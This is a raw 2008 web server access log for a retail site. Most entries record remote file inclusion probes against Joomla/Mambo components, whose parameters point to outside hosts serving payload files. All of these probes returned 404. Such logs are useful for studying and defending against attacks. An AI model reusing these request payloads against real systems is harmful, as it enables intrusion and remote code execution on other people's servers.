86.109.96.134 - - [05/Dec/2008:01:07:39 -0800] "GET /logs/access_081104.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.prairiehomeoutfitters.com"
217.111.67.5 - - [05/Dec/2008:01:07:41 -0800] "GET /logs/access_081109.log/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tier1-visa.ru//assets/images/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.prairiehomeoutfitters.com"
217.111.67.5 - - [05/Dec/2008:01:07:41 -0800] "GET /logs/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tier1-visa.ru//assets/images/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.prairiehomeoutfitters.com"
217.111.67.5 - - [05/Dec/2008:01:07:41 -0800] "GET /index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tier1-visa.ru//assets/images/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.prairiehomeoutfitters.com"
38.103.63.60 - - [05/Dec/2008:01:07:48 -0800] "GET /navigation_bars/Nav_Doorknobs.nav HTTP/1.1" 200 2364 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.prairiehomeoutfitters.com"
38.103.63.60 - - [05/Dec/2008:01:08:24 -0800] "GET /navigation_bars/Store_Navigation_Testing.nav HTTP/1.1" 200 5173 "-" "CCBot/1.0 (+http://www.commoncrawl.org/bot.html)" "www.prairiehomeoutfitters.com"
86.109.96.134 - - [05/Dec/2008:01:08:47 -0800] "GET /logs/access_081109.log%20//components/com_flyspray/startdown.php?file=http://www.codeduc.cl/components/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.prairiehomeoutfitters.com"
216.195.54.236 - - [05/Dec/2008:01:10:11 -0800] "GET /logs/access_081023.log/index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://tier1-visa.ru//assets/images/ID.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.prairiehomeoutfitters.com"